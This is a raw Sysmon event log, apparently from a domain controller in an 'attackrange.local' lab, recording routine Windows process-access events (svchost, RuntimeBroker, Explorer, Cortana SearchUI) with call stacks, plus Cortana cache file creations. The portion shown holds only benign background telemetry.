13:30:11.045{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011294Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.045{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011293Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.045{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011292Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.029{08A6967A-4753-6000-0D05-000000009A01}11165504C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011291Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.029{08A6967A-4753-6000-0D05-000000009A01}11165504C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000012296Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.498{08A6967A-4753-6000-0D05-000000009A01}11161852C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.onecore.dll+1a5a3|C:\Windows\system32\windows.cortana.onecore.dll+1a642|C:\Windows\system32\windows.cortana.onecore.dll+16b12|C:\Windows\system32\windows.cortana.onecore.dll+16a5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000012295Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.498{08A6967A-4753-6000-0D05-000000009A01}11161852C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.onecore.dll+1a5a3|C:\Windows\system32\windows.cortana.onecore.dll+6118|C:\Windows\system32\windows.cortana.onecore.dll+169b1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce 10341000x800000000000000012294Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.498{08A6967A-4753-6000-0D05-000000009A01}11165920C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+13c5d7|C:\Windows\System32\windows.storage.dll+13e363|C:\Windows\System32\windows.storage.dll+13c548|C:\Windows\System32\windows.storage.dll+13c40d|C:\Windows\System32\windows.storage.dll+73bac|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.storage.dll+14735c 10341000x800000000000000012293Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.498{08A6967A-4753-6000-0D05-000000009A01}11165920C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+60608|C:\Windows\System32\windows.storage.dll+13e344|C:\Windows\System32\windows.storage.dll+13c548|C:\Windows\System32\windows.storage.dll+13c40d|C:\Windows\System32\windows.storage.dll+73bac|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.storage.dll+14735c 10341000x800000000000000012292Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.498{08A6967A-4753-6000-0D05-000000009A01}11165920C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+13d57b|C:\Windows\System32\windows.storage.dll+13ccf5|C:\Windows\System32\windows.storage.dll+13cc5e|C:\Windows\System32\windows.storage.dll+13c3c6|C:\Windows\System32\windows.storage.dll+73bac|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.storage.dll+14735c 10341000x800000000000000012291Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.498{08A6967A-4753-6000-0D05-000000009A01}11161852C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+6411c|C:\Windows\System32\windows.storage.dll+13bb89|C:\Windows\System32\windows.storage.dll+13b9c4|C:\Windows\System32\windows.storage.dll+818c6|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce 10341000x800000000000000012290Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.498{08A6967A-4753-6000-0D05-000000009A01}11165920C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+13c0f0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.storage.dll+14735c|C:\Windows\System32\windows.storage.dll+146cea|C:\Windows\System32\windows.storage.dll+1a6029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012289Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.498{08A6967A-4753-6000-0D05-000000009A01}11165920C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+6430f|C:\Windows\System32\windows.storage.dll+62682|C:\Windows\System32\windows.storage.dll+62c78|C:\Windows\System32\windows.storage.dll+13a887|C:\Windows\System32\windows.storage.dll+13c0d5|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.storage.dll+14735c 10341000x800000000000000012288Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.498{08A6967A-4753-6000-0D05-000000009A01}11165920C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+63043|C:\Windows\System32\windows.storage.dll+13a985|C:\Windows\System32\windows.storage.dll+13a86d|C:\Windows\System32\windows.storage.dll+13c0d5|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.storage.dll+14735c|C:\Windows\System32\windows.storage.dll+146cea 10341000x800000000000000012287Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.498{08A6967A-4753-6000-0D05-000000009A01}11161852C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+6411c|C:\Windows\System32\windows.storage.dll+13bb89|C:\Windows\System32\windows.storage.dll+13b9c4|C:\Windows\System32\windows.storage.dll+818c6|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce 11241100x800000000000000012286Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.482{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{129e7850-3019-4df9-9878-d0fae2cae79c}\0.2.filtertrie.intermediate.txt2021-01-14 13:30:12.482 11241100x800000000000000012285Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.482{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{129e7850-3019-4df9-9878-d0fae2cae79c}\0.1.filtertrie.intermediate.txt2021-01-14 13:30:12.482 11241100x800000000000000012284Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.482{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{129e7850-3019-4df9-9878-d0fae2cae79c}\0.0.filtertrie.intermediate.txt2021-01-14 13:30:12.482 11241100x800000000000000012283Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.435{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{c472e3fe-9212-44e6-9e11-2703485556a3}\appssynonyms.txt2016-04-15 08:09:24.000 10341000x800000000000000012282Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.435{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012281Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.389{08A6967A-4754-6000-1705-000000009A01}34084336C:\Windows\Explorer.EXE{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+6468|C:\Windows\System32\SHCORE.dll+6437|C:\Windows\System32\SHCORE.dll+6327|C:\Windows\System32\SHCORE.dll+629d|C:\Windows\System32\SHCORE.dll+61aa|C:\Windows\System32\SHELL32.dll+46770|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9174|UNKNOWN(FFFFF8021D6E18D8)|UNKNOWN(FFFFAA4CF6CB21F8)|UNKNOWN(FFFFAA4CF6CB2377)|UNKNOWN(FFFFAA4CF6CACA01)|UNKNOWN(FFFFAA4CF6CAE3CA)|UNKNOWN(FFFFAA4CF6CAC686)|UNKNOWN(FFFFF8021D3F8E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+49fdb|C:\Windows\System32\SHELL32.dll+10a26a|C:\Windows\System32\SHCORE.dll+2fedd 10341000x800000000000000012280Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.389{08A6967A-4754-6000-1705-000000009A01}34084336C:\Windows\Explorer.EXE{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+6468|C:\Windows\System32\SHCORE.dll+124a5|C:\Windows\System32\SHELL32.dll+46251|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9174|UNKNOWN(FFFFF8021D6E18D8)|UNKNOWN(FFFFAA4CF6CB21F8)|UNKNOWN(FFFFAA4CF6CB2377)|UNKNOWN(FFFFAA4CF6CACA01)|UNKNOWN(FFFFAA4CF6CAE3CA)|UNKNOWN(FFFFAA4CF6CAC686)|UNKNOWN(FFFFF8021D3F8E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+49fdb|C:\Windows\System32\SHELL32.dll+10a26a|C:\Windows\System32\SHCORE.dll+2fedd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000012279Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.389{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache132551046122438456.txt2021-01-14 13:30:12.389 10341000x800000000000000012278Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012277Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 